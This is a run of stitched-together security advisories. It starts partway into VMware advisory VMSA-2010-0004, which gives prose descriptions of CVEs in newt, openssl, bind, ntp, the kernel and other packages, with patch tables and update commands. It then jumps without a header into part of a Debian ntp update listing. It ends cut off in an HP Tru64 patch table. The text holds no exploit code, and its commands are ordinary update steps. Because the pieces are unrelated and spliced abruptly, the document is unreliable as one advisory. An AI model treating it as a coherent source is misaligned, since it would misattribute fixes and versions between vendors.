CVE-2009-0590\n                   CVE-2009-4022 CVE-2009-3560 CVE-2009-3720\n                   CVE-2009-2904 CVE-2009-3563 CVE-2009-2695\n                   CVE-2009-2849 CVE-2009-2695 CVE-2009-2908\n                   CVE-2009-3228 CVE-2009-3286 CVE-2009-3547\n                   CVE-2009-3613 CVE-2009-3612 CVE-2009-3620\n                   CVE-2009-3621 CVE-2009-3726 CVE-2008-3916\n                   CVE-2009-1189 CVE-2009-0115\n\n- ------------------------------------------------------------------------\n\n1. Summary\n\n   ESX Service Console updates for newt, nfs-utils, and glib2 packages. \n\n   vMA updates for newt, nfs-util, glib2, kpartx, libvolume-id,\n   device-mapper-multipath, fipscheck, dbus, dbus-libs, ed, openssl,\n   bind, expat, openssh, ntp and kernel packages. \n\n2. Relevant releases\n\n   VMware ESX 4.0.0 without patch ESX400-201002404-SG, ESX400-201002407-SG,\n                                  ESX400-201002406-SG\n\n   VMware vMA 4.0 before patch 3\n\n3. Problem Description\n\n a. vMA and Service Console update for newt to 0.52.2-12.el5_4.1\n\n    Newt is a programming library for color text mode, widget based\n    user interfaces. Newt can be used to add stacked windows, entry\n    widgets, checkboxes, radio buttons, labels, plain text fields,\n    scrollbars, etc., to text mode user interfaces. \n\n    A heap-based buffer overflow flaw was found in the way newt\n    processes content that is to be displayed in a text dialog box. \n    A local attacker could issue a specially-crafted text dialog box\n    display request (direct or via a custom application), leading to a\n    denial of service (application crash) or, potentially, arbitrary\n    code execution with the privileges of the user running the\n    application using the newt library. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2009-2905 to this issue. \n\n    The following table lists what action remediates the vulnerability\n    (column 4) if a solution is available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.0       ESX      ESX400-201002406-SG\n    ESX            3.5       ESX      not affected\n    ESX            3.0.3     ESX      not affected\n    ESX            2.5.5     ESX      not affected\n\n    vMA            4.0       RHEL5    Patch 3\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n b. vMA and Service Console update for vMA package nfs-utils to\n    1.0.9-42.el5\n\n    The nfs-utils package provides a daemon for the kernel NFS server\n    and related tools. \n\n    It was discovered that nfs-utils did not use tcp_wrappers\n    correctly.  Certain hosts access rules defined in \"/etc/hosts.allow\"\n    and \"/etc/hosts.deny\" may not have been honored, possibly allowing\n    remote attackers to bypass intended access restrictions. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2008-4552 to this issue. \n\n    The following table lists what action remediates the vulnerability\n    (column 4) if a solution is available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.0       ESX      ESX400-201002407-SG\n    ESX            3.5       ESX      not affected\n    ESX            3.0.3     ESX      not affected\n    ESX            2.5.5     ESX      not affected\n\n    vMA            4.0       RHEL5    Patch 3\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n c. vMA and Service Console package glib2 updated to 2.12.3-4.el5_3.1\n\n    GLib is the low-level core library that forms the basis for projects\nsuch\n    as GTK+ and GNOME. It provides data structure handling for C,\n    portability wrappers, and interfaces for such runtime functionality\n    as an event loop, threads, dynamic loading, and an object system. \n\n    Multiple integer overflows in glib/gbase64.c in GLib before 2.20\n    allow context-dependent attackers to execute arbitrary code via a\n    long string that is converted either from or to a base64\n    representation. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2008-4316 to this issue. \n\n    The following table lists what action remediates the vulnerability\n    (column 4) if a solution is available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.0       ESX      ESX400-201002404-SG\n    ESX            3.5       ESX      not affected\n    ESX            3.0.3     ESX      not affected\n    ESX            2.5.5     ESX      not affected\n\n    vMA            4.0       RHEL5    Patch 3\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n d. vMA and Service Console update for openssl to 0.9.8e-12.el5\n\n    SSL is a toolkit implementing SSL v2/v3 and TLS protocols with full-\n    strength cryptography world-wide. \n\n    Multiple denial of service flaws were discovered in OpenSSL\u0027s DTLS\n    implementation. A remote attacker could use these flaws to cause a\n    DTLS server to use excessive amounts of memory, or crash on an\n    invalid memory access or NULL pointer dereference. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the names CVE-2009-1377, CVE-2009-1378,\n    CVE-2009-1379, CVE-2009-1386, CVE-2009-1387 to these issues. \n\n    An input validation flaw was found in the handling of the BMPString\n    and UniversalString ASN1 string types in OpenSSL\u0027s\n    ASN1_STRING_print_ex() function. An attacker could use this flaw to\n    create a specially-crafted X.509 certificate that could cause\n    applications using the affected function to crash when printing\n    certificate contents. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2009-0590 to this issue. \n\n    The following table lists what action remediates the vulnerability\n    (column 4) if a solution is available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.0       ESX      affected, patch pending\n    ESX            3.5       ESX      not affected\n    ESX            3.0.3     ESX      not affected\n    ESX            2.5.5     ESX      not affected\n\n    vMA            4.0       RHEL5    Patch 3\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n e. vMA and Service Console package bind updated to 9.3.6-4.P1.el5_4.1\n\n    It was discovered that BIND was incorrectly caching responses\n    without performing proper DNSSEC validation, when those responses\n    were received during the resolution of a recursive client query\n    that requested DNSSEC records but indicated that checking should be\n    disabled. A remote attacker could use this flaw to bypass the DNSSEC\n    validation check and perform a cache poisoning attack if the target\n    BIND server was receiving such client queries. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2009-4022 to this issue. \n\n    The following table lists what action remediates the vulnerability\n    (column 4) if a solution is available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not applicable\n\n    ESX            4.0       ESX      affected, patch pending\n    ESX            3.5       ESX      not affected\n    ESX            3.0.3     ESX      not affected\n    ESX            2.5.5     ESX      not affected\n\n    vMA            4.0       RHEL5    Patch 3\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n f. vMA and Service Console package expat updated to 1.95.8-8.3.el5_4.2. \n\n    Two buffer over-read flaws were found in the way Expat handled\n    malformed UTF-8 sequences when processing XML files. A specially-\n    crafted XML file could cause applications using Expat to fail while\n    parsing the file. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the names CVE-2009-3560 and CVE-2009-3720 to these\n    issues. \n\n    The following table lists what action remediates the vulnerability\n    (column 4) if a solution is available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not applicable\n\n    ESX            4.0       ESX      affected, patch pending\n    ESX            3.5       ESX      affected, patch pending\n    ESX            3.0.3     ESX      affected, patch pending\n    ESX            2.5.5     ESX      affected, patch pending\n\n    vMA            4.0       RHEL5    Patch 3\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n g. vMA and Service Console package openssh update to 4.3p2-36.el5_4.2\n \n    A Red Hat specific patch used in the openssh packages as shipped in\n    Red Hat Enterprise Linux 5.4 (RHSA-2009:1287) loosened certain\n    ownership requirements for directories used as arguments for the\n    ChrootDirectory configuration options. A malicious user that also\n    has or previously had non-chroot shell access to a system could\n    possibly use this flaw to escalate their privileges and run\n    commands as any system user. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2009-2904 to this issue. \n\n    The following table lists what action remediates the vulnerability\n    (column 4) if a solution is available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not applicable\n\n    ESX            4.0       ESX      affected, patch pending\n    ESX            3.5       ESX      not affected\n    ESX            3.0.3     ESX      not affected\n    ESX            2.5.5     ESX      not affected\n\n    vMA            4.0       RHEL5    Patch 3\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n h. vMA and Service Console package ntp updated to\n    ntp-4.2.2p1-9.el5_4.1.i386.rpm\n\n    A flaw was discovered in the way ntpd handled certain malformed NTP\n    packets. ntpd logged information about all such packets and replied\n    with an NTP packet that was treated as malformed when received by\n    another ntpd. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the name CVE-2009-3563 to this issue.   \n\n    The following table lists what action remediates the vulnerability\n    (column 4) if a solution is available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not applicable\n\n    ESX            4.0       ESX      affected, patch pending\n    ESX            3.5       ESX      affected, patch pending\n    ESX            3.0.3     ESX      affected, patch pending\n    ESX            2.5.5     ESX      affected, patch pending\n\n    vMA            4.0       RHEL5    Patch 3\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n i. vMA update for package kernel to 2.6.18-164.9.1.el5\n\n    Updated vMA package kernel addresses the security issues listed\n    below. \n \n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the name CVE-2009-2849 to the security issue fixed in\n    kernel 2.6.18-128.2.1\n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2009-2695, CVE-2009-2908, CVE-2009-3228,\n    CVE-2009-3286, CVE-2009-3547, CVE-2009-3613 to the security issues\n    fixed in kernel 2.6.18-128.6.1\n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    has assigned the names CVE-2009-3612, CVE-2009-3620, CVE-2009-3621,\n    CVE-2009-3726 to the security issues fixed in kernel\n    2.6.18-128.9.1\n\n    The following table lists what action remediates the vulnerability\n    (column 4) if a solution is available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.0       ESX      affected, patch pending\n    ESX            3.5       ESX      not affected\n    ESX            3.0.3     ESX      not affected\n    ESX            2.5.5     ESX      not affected\n\n    vMA            4.0       RHEL5    Patch 3 **\n\n  * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n  ** vMA is updated to kernel version 2.6.18-164.9.1\n\n j. vMA 4.0 updates for the packages kpartx, libvolume-id,\n    device-mapper-multipath, fipscheck, dbus, dbus-libs, and ed\n\n    kpartx updated to 0.4.7-23.el5_3.4, libvolume-id updated to\n    095-14.20.el5 device-mapper-multipath package updated to\n    0.4.7-23.el5_3.4, fipscheck updated to 1.0.3-1.el5, dbus\n    updated to 1.1.2-12.el5, dbus-libs updated to 1.1.2-12.el5,\n    and ed package updated to 0.2-39.el5_2. \n\n    The Common Vulnerabilities and Exposures Project (cve.mitre.org)\n    has assigned the names CVE-2008-3916, CVE-2009-1189 and\n    CVE-2009-0115 to these issues. \n\n    The following table lists what action remediates the vulnerability\n    (column 4) if a solution is available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    VirtualCenter  any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.0       ESX      not affected\n    ESX            3.5       ESX      not affected\n    ESX            3.0.3     ESX      not affected\n    ESX            3.0.2     ESX      not affected\n    ESX            2.5.5     ESX      not affected\n\n    vMA            4.0       RHEL5    Patch 3\n\n  * hosted products are VMware Workstation, Player, ACE, Server, Fusion. \n\n4. Solution\n\n   Please review the patch/release notes for your product and version\n   and verify the md5sum of your downloaded file. \n\n   ESX 4.0\n   -------\n \nhttps://hostupdate.vmware.com/software/VUM/OFFLINE/release-192-20100228-732\n240/ESX400-201002001.zip\n   md5sum: de62cbccaffa4b2b6831617f18c1ccb4\n   sha1sum: 4083f191fa4acd6600c9a87e4852f9f5700e91ab\n   http://kb.vmware.com/kb/1018403\n\n   Note: ESX400-201002001 contains the following security bulletins\n   ESX400-201002404-SG, ESX400-201002407-SG, and ESX400-201002406-SG. \n\n   To install an individual bulletin use esxupdate with the -b option. \n   esxupdate --bundle ESX400-201002001.zip -b ESX400-201002404-SG \\\n   -b ESX400-201002407-SG -b ESX400-201002406-SG update\n\n   vMA 4.0\n   -------\n   To update VIMA\n       1 Log in to VIMA as vi-admin. \n       2 type \u0027sudo /usr/sbin/vima-update update\u0027 this will apply all\n         currently available updates.  See http://tinyurl.com/yfekgrx\n         for more information. \n\n5. References\n\n   CVE numbers\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2905\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4552\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4316\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1377\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1378\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1379            \n     \n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1386\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1387\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0590\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4022\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3560\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3720\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2904\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3563\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2695\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2849\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2695\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2908\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3228\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3286\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3547\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3613\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3612\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3620\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3621\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3726\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3916\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1189\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0115\n\n- ------------------------------------------------------------------------\n6. Change log\n\n2010-03-03  VMSA-2010-0004\nInitial security advisory after release of bulletins for ESX 4.0\non 2010-03-03 and release of vMA Patch 3 on 2010-02-25. \n\n- -----------------------------------------------------------------------\n7. Contact\n\nE-mail list for product security notifications and announcements:\nhttp://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\n\nThis Security Advisory is posted to the following lists:\n\n  * security-announce at lists.vmware.com\n  * bugtraq at securityfocus.com\n  * full-disclosure at lists.grok.org.uk\n\nE-mail:  security at vmware.com\nPGP key at: http://kb.vmware.com/kb/1055\n\nVMware Security Center\nhttp://www.vmware.com/security\n\nVMware security response policy\nhttp://www.vmware.com/support/policies/security_response.html\n\nGeneral support life cycle policy\nhttp://www.vmware.com/support/policies/eos.html\n\nVMware Infrastructure support life cycle policy\nhttp://www.vmware.com/support/policies/eos_vi.html\n\nCopyright 2010 VMware Inc.  All rights reserved. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP Desktop 9.8.3 (Build 4028)\nCharset: utf-8\n\nwj8DBQFLj1c6S2KysvBH1xkRAnl5AJ9RcHVB7qooSwOPFdVoDFTjohDypgCfZ44O\n2z0ICIcntM88ZONMfDNUM6Y=\n=14fN\n-----END PGP SIGNATURE-----\n. \n\n\nFor the oldstable distribution (etch), this problem has been fixed in\nversion 1:4.2.2.p4+dfsg-2etch4. \n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 1:4.2.4p4+dfsg-8lenny3. \n\nFor the testing (squeeze) and unstable (sid) distribution, this problem\nwill be fixed soon. \n\n\nWe recommend that you upgrade your ntp packages. \n\nUpgrade instructions\n- --------------------\n\nwget url\n        will fetch the file for you\ndpkg -i file.deb\n        will install the referenced file. \n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n        will update the internal database\napt-get upgrade\n        will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration. \n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nDebian (oldstable)\n- ------------------\n\nOldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. \n\nSource archives:\n\n  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4.dsc\n    Size/MD5 checksum:      906 115e93f010e32aa1c90231461487503a\n  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg.orig.tar.gz\n    Size/MD5 checksum:  2199764 ad746cda2d90dbb9ed06fe164273c5d0\n  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4.diff.gz\n    Size/MD5 checksum:   182632 80aa236bd0a39096c5e5d462c0b9b279\n\nArchitecture independent packages:\n\n  http://security.debian.org/pool/updates/main/n/ntp/ntp-refclock_4.2.2.p4+dfsg-2etch4_all.deb\n    Size/MD5 checksum:    28596 df605f89c08a01116c2ff799777f6a2c\n  http://security.debian.org/pool/updates/main/n/ntp/ntp-simple_4.2.2.p4+dfsg-2etch4_all.deb\n    Size/MD5 checksum:    28594 0c683ac7e7f5b131515f956aed87de3d\n  http://security.debian.org/pool/updates/main/n/ntp/ntp-doc_4.2.2.p4+dfsg-2etch4_all.deb\n    Size/MD5 checksum:   912886 1af5a623cbf5f145f34dab7beefcd183\n\nalpha architecture (DEC Alpha)\n\n  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_alpha.deb\n    Size/MD5 checksum:   408070 ca33235c58a26ad1a839084b4f2d385c\n  http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_alpha.deb\n    Size/MD5 checksum:    65056 e527eb4c93d427c025374805fb5288cb\n\namd64 architecture (AMD x86_64 (AMD64))\n\n  http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_amd64.deb\n    Size/MD5 checksum:    62258 13a4f4faaf699913e421c093e598f2a9\n  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_amd64.deb\n    Size/MD5 checksum:   359384 1a289aa1f8439e2ef736cbf29bbe140f\n\narm architecture (ARM)\n\n  http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_arm.deb\n    Size/MD5 checksum:    59784 8a84cae4e8f643cbd3ed684e5a7eb0ff\n  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_arm.deb\n    Size/MD5 checksum:   344316 57066e8abfdf51c36d63600c993f3c20\n\nhppa architecture (HP PA RISC)\n\n  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_hppa.deb\n    Size/MD5 checksum:   372448 0b8f9b90bb03a2f572066fe8b47c7202\n  http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_hppa.deb\n    Size/MD5 checksum:    62160 88dc964fa357187ddc97d37513a863ba\n\ni386 architecture (Intel ia32)\n\n  http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_i386.deb\n    Size/MD5 checksum:    58316 90fc92e7a8f6582ee21076849ae0dfba\n  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_i386.deb\n    Size/MD5 checksum:   333772 e5fbae24686d444fff118f3ce9cc45db\n\nia64 architecture (Intel ia64)\n\n  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_ia64.deb\n    Size/MD5 checksum:   523358 0032e3c9bcb4a27a312a47fb95d1f9a1\n  http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_ia64.deb\n    Size/MD5 checksum:    74712 72c1b601f4beb41c6c04a54534ba9c51\n\nmips architecture (MIPS (Big Endian))\n\n  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_mips.deb\n    Size/MD5 checksum:   382868 2980d63a9ca6344e6a76698d0e808f8c\n  http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_mips.deb\n    Size/MD5 checksum:    63610 d523930b9b98d6353bf4e6fb7d7e57f5\n\nmipsel architecture (MIPS (Little Endian))\n\n  http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_mipsel.deb\n    Size/MD5 checksum:    64134 e4042de5af081701911a7cece69c6cce\n  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_mipsel.deb\n    Size/MD5 checksum:   390142 b50dc2bd5970f224b6994c460f8f560a\n\npowerpc architecture (PowerPC)\n\n  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_powerpc.deb\n    Size/MD5 checksum:   358860 432b58ad621ac266455f7e5124d2eb1c\n  http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_powerpc.deb\n    Size/MD5 checksum:    61760 2c9dd1b3a8d61bece4f420e533b7a6eb\n\ns390 architecture (IBM S/390)\n\n  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_s390.deb\n    Size/MD5 checksum:   350300 40a28748d5016101c179bd4a22c08390\n  http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_s390.deb\n    Size/MD5 checksum:    61242 14c08344bfd0561ced0d54aa2cd23a2e\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n  http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_sparc.deb\n    Size/MD5 checksum:    58584 0e573ef22b1514b12e01fa6ac2bb1ddb\n  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_sparc.deb\n    Size/MD5 checksum:   332284 4589ff44bc97ad73513d8ba5419c7845\n\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nDebian (stable)\n- ---------------\n\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. \n\nSource archives:\n\n  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3.dsc\n    Size/MD5 checksum:     1459 81e70fe84f27e3bfabdbfb9f3122492b\n  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg.orig.tar.gz\n    Size/MD5 checksum:  2835029 dc2b3ac9cc04b0f29df35467514c9884\n  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3.diff.gz\n    Size/MD5 checksum:   300928 b568f39eda3e46f27239ad44021f968c\n\nArchitecture independent packages:\n\n  http://security.debian.org/pool/updates/main/n/ntp/ntp-doc_4.2.4p4+dfsg-8lenny3_all.deb\n    Size/MD5 checksum:   927658 8db03976b7b105057ead2da4bae09219\n\nalpha architecture (DEC Alpha)\n\n  http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_alpha.deb\n    Size/MD5 checksum:    66706 9213dcba9a99fa363f0ce48c514a008b\n  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_alpha.deb\n    Size/MD5 checksum:   538492 de37b288ef933f34446ab78a8d8ed76b\n\namd64 architecture (AMD x86_64 (AMD64))\n\n  http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_amd64.deb\n    Size/MD5 checksum:    63836 a0b5b030abe6a6c32591366febcec1d1\n  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_amd64.deb\n    Size/MD5 checksum:   479472 277efe45a76a24da6ca14ae581d0a3a2\n\narm architecture (ARM)\n\n  http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_arm.deb\n    Size/MD5 checksum:    61220 d4905eea52795330e517acca903059f4\n  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_arm.deb\n    Size/MD5 checksum:   448164 cc28e545eb359eba225abfcb02cc4377\n\narmel architecture (ARM EABI)\n\n  http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_armel.deb\n    Size/MD5 checksum:    62794 e5a43b8076a77643cc742348f0e63de1\n  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_armel.deb\n    Size/MD5 checksum:   458908 3721b8d7b7a67b31db6249521dd9f015\n\nhppa architecture (HP PA RISC)\n\n  http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_hppa.deb\n    Size/MD5 checksum:    63872 53a7009f1888c06b162c258a9bb5d6fb\n  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_hppa.deb\n    Size/MD5 checksum:   485744 b8e950ba02a13ecacfe332db56c0c887\n\ni386 architecture (Intel ia32)\n\n  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_i386.deb\n    Size/MD5 checksum:   434672 6ccfb060f39cc56f39ef8806865b767d\n  http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_i386.deb\n    Size/MD5 checksum:    60114 2f0914ae2191ddf3f74529bc896299da\n\nia64 architecture (Intel ia64)\n\n  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_ia64.deb\n    Size/MD5 checksum:   707812 eb960c732894d56589ba62d76c5ba568\n  http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_ia64.deb\n    Size/MD5 checksum:    76366 6b5b986e454276661e8b483f095bd16e\n\nmips architecture (MIPS (Big Endian))\n\n  http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_mips.deb\n    Size/MD5 checksum:    64116 ab287c70d2c2daf7b1a8808db8dcedc9\n  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_mips.deb\n    Size/MD5 checksum:   490394 0009cb5333123767dc3afcde682d9e10\n\nmipsel architecture (MIPS (Little Endian))\n\n  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_mipsel.deb\n    Size/MD5 checksum:   500786 3b842b738e616f301c31cd025c595235\n  http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_mipsel.deb\n    Size/MD5 checksum:    64776 fd31cdaa7a78d7e3fa072b746dd98e01\n\npowerpc architecture (PowerPC)\n\n  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_powerpc.deb\n    Size/MD5 checksum:   490620 21d03b435c327c2884fe587a56fe10fb\n  http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_powerpc.deb\n    Size/MD5 checksum:    65470 6966f71002ae63c104e608af1a7daa3a\n\ns390 architecture (IBM S/390)\n\n  http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_s390.deb\n    Size/MD5 checksum:    63678 4b143ad2444681bdb1ee44d395996a29\n  http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_s390.deb\n    Size/MD5 checksum:   474000 6fb44a33381b0d582599eb33896d8f0f\n\n\n  These files will probably be moved into the stable distribution on\n  its next update. \n\nProduct/Patch kit\n ITRC Download Location\n MD5 and SHA1 Checksum\n\nHP Tru64 UNIX v 5.1B-4 PK6 (BL27)\n  T64KIT1001787-V51BB27-ES-20100817\n  http://www.itrc.hp.com/service/patch/patchDetail.do?patchid=T64KIT1001787-V51BB27-ES-20100817\n  MD5 results:  